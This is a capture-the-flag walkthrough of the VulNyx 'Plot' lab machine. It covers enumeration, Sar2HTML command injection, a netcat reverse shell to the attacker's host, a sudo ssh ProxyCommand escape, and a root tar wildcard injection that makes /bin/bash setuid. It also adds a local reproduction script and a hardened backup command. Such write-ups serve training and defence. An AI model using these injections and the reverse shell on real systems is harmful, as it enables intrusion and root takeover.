Information

Plot is an easy-rated vulnerable Linux virtual machine from the VulNyx platform, created by the user d4t4s3c; it runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 11:03 CEST
Nmap scan report for 192.168.1.109
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
 nmap -sVC -p22,80 192.168.1.109
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 11:03 CEST
Nmap scan report for 192.168.1.109
Host is up (0.00041s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)

Shell (www-data)

80/TCP (HTTP)

Site

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.109/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.109/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 319] [--> http://192.168.1.109/javascript/]
/server-status        (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

Headers

The response headers reveal the domain pl0t.nyx (in X-Custom-Header), which I add to my /etc/hosts file

 curl -I "http://192.168.1.109/"
HTTP/1.1 200 OK
Date: Tue, 27 May 2025 09:07:33 GMT
Server: Apache/2.4.56 (Debian)
X-Custom-Header: pl0t.nyx
Last-Modified: Thu, 03 Aug 2023 14:18:08 GMT
ETag: "29cd-60205730d2279"
Accept-Ranges: bytes
Content-Length: 10701
Vary: Accept-Encoding
Content-Type: text/html

Accessing the site by IP or by the pl0t.nyx domain returns the same content, so the domain alone is not the way in

VHOST Brute Force

With gobuster in vhost mode I find the subdomain sar.pl0t.nyx (its response size differs from the default page), which I also add to my /etc/hosts file

 gobuster vhost -w /opt/subdomains-top1million-5000.txt -u 'http://pl0t.nyx' --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://pl0t.nyx
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /opt/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: sar.pl0t.nyx Status: 200 [Size: 4812]
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================

Sar2HTML

I find a Sar2HTML instance and enumerate its version: 3.2.1

Searching online I find the exploit; the PoC is the following (a command appended after a `;` in the plot parameter is executed by the server):

http://<ipaddr>/index.php?plot=;<command-here>

Reverse Shell

I manage to inject a command (first id to confirm execution, then a netcat reverse shell, with + standing in for spaces in the query string; the target's netcat build supports -e) and get a shell as the www-data user

 curl -sX GET "http://sar.pl0t.nyx/index.php?plot=;id"
 curl -sX GET "http://sar.pl0t.nyx/index.php?plot=;nc+192.168.1.5+443+-e+/bin/sh"
 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.109] 57030
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
plot

Shell (tony)

Enumeration

Sudo

The www-data user can run the ssh binary as tony via sudo, without a password

www-data@plot:/$ sudo -l
Matching Defaults entries for www-data on plot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on plot:
    (tony) NOPASSWD: /usr/bin/ssh

Abuse

GTFOBins gives the shell-escape sequence: ssh runs ProxyCommand through sh before it ever connects, so the hostname x never needs to resolve, and the redirections 0<&2 1>&2 attach the spawned shell's stdin and stdout to ssh's stderr (the terminal) because its stdin and stdout are pipes to ssh. I become the user tony

www-data@plot:/$ sudo -u tony /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ bash -i 
tony@plot:/$ id ; hostname
uid=1000(tony) gid=1000(tony) groups=1000(tony)
plot

Privilege Escalation

Enumeration

Cron

With pspy I spot an interesting cron job run by root (UID=0)

2025/05/27 12:01:01 CMD: UID=0     PID=1275   | /usr/sbin/CRON -f 
2025/05/27 12:01:01 CMD: UID=0     PID=1276   | /bin/sh -c cd /var/www/html && tar -zcf /var/backups/serve.tgz * 
2025/05/27 12:01:01 CMD: UID=0     PID=1277   | tar -zcf /var/backups/serve.tgz index.html 
2025/05/27 12:01:01 CMD: UID=0     PID=1278   | /bin/sh -c gzip

Abuse

Wildcard

In the job's command, tar is not given a specific path or file list; it is handed the wildcard *, meaning "any file", and the cron shell (/bin/sh -c) expands it to every file name in /var/www/html before tar starts. The pspy capture shows the expanded form (tar -zcf /var/backups/serve.tgz index.html): whatever names exist in that directory become tar arguments, and a name beginning with -- is parsed by tar as an option.

tar -zcf /var/backups/serve.tgz *

Command Injection

Inside /var/www/html (which tony can write to) I create the script injection.sh plus two files whose names are GNU tar options: --checkpoint=1 makes tar check in after every record, and --checkpoint-action=exec=sh injection.sh runs the script at that checkpoint. When the job next fires, tar (running as root) executes the script, which sets the setuid bit on /bin/bash

tony@plot:~$ cd /var/www/html/
tony@plot:/var/www/html$ touch -- "--checkpoint=1"
tony@plot:/var/www/html$ touch -- "--checkpoint-action=exec=sh injection.sh"
tony@plot:/var/www/html$ echo "chmod 4755 /bin/bash" > injection.sh
tony@plot:/var/www/html$ chmod +x injection.sh

Once the job has run, /bin/bash is setuid root. Running it with -p keeps the effective UID instead of dropping it, and I become root by abusing the privilege

tony@plot:/var/www/html$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
tony@plot:/var/www/html$ /bin/bash -p
bash-5.1# id ; hostname
uid=1000(tony) gid=1000(tony) euid=0(root) groups=1000(tony)
plot
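The wildcard injection above, reproduced locally as an added example (not part of the original write-up): it builds a throwaway "web root" that mimics /var/www/html after the payload is planted, runs the cron job's exact command shape to show that the injected script fires, runs a hardened form of the same backup to show that it does not, and lists the option-like file names a defender would look for. It assumes GNU tar (the --checkpoint options are GNU extensions) and uses a marker file instead of chmod 4755 /bin/bash so it can run unprivileged.

```sh
#!/bin/sh
# Added example, not from the original write-up: reproduces the tar wildcard
# injection from the cron job in a scratch directory so the mechanism (and
# its fix) can be observed without touching a real system.
# Assumes GNU tar; --checkpoint and --checkpoint-action are GNU extensions.

# Build a throwaway "web root" that mimics /var/www/html after the attacker
# has planted the payload: a real file, the payload script, and two file
# names that the shell's '*' expansion will hand to tar as options.
# Prints the directory path.
make_webroot() {
    webroot=$(mktemp -d)
    echo '<h1>It works</h1>' > "$webroot/index.html"
    # Stand-in for "chmod 4755 /bin/bash": just drop a marker file.
    printf '#!/bin/sh\ntouch "%s/PWNED"\n' "$webroot" > "$webroot/injection.sh"
    touch -- "$webroot/--checkpoint=1"
    touch -- "$webroot/--checkpoint-action=exec=sh injection.sh"
    echo "$webroot"
}

# Same command line shape as the cron job (cd + unquoted '*'). The glob is
# expanded by the shell before tar starts, so tar receives the two
# "--checkpoint..." names as options next to index.html and injection.sh,
# and runs "sh injection.sh" at the first checkpoint.
# Returns 0 if the injected script ran (marker present), 1 otherwise.
vulnerable_backup() {
    dir=$1
    rm -f "$dir/PWNED"
    ( cd "$dir" && tar -zcf "$dir.tgz" * ) >/dev/null 2>&1
    [ -e "$dir/PWNED" ]
}

# Hardened form: name the directory instead of letting the shell glob it.
# Every entry is then archived as "./<name>", so a file called
# "--checkpoint=1" is just data and never reaches tar's option parser.
# Returns 0 if the injection fired (it should not), 1 if it was neutralised.
safe_backup() {
    dir=$1
    rm -f "$dir/PWNED"
    tar -zcf "$dir.tgz" -C "$dir" . >/dev/null 2>&1
    [ -e "$dir/PWNED" ]
}

# Defender's check: list entries whose names begin with '-'. In a directory
# that a root cron job globs, any such name deserves a look.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | sort
}

# Stand-alone run
d=$(make_webroot)
if vulnerable_backup "$d"; then
    echo "unquoted glob: injection.sh ran as $(id -un)"
fi
if safe_backup "$d"; then
    echo "hardened form: still vulnerable"
else
    echo "hardened form: injection neutralised"
fi
echo "option-like names in $d:"
option_like_names "$d"
rm -rf "$d" "$d.tgz"
```

The same fix applies to the real job: tar -zcf /var/backups/serve.tgz -C /var/www/html . archives the directory without ever letting the shell expand a file name into an argument.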

Flags

Now as root I can read the user.txt and root.txt flags

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
f4ad****************************
1475****************************

That concludes the resolution of the Plot machine.

Happy Hacking!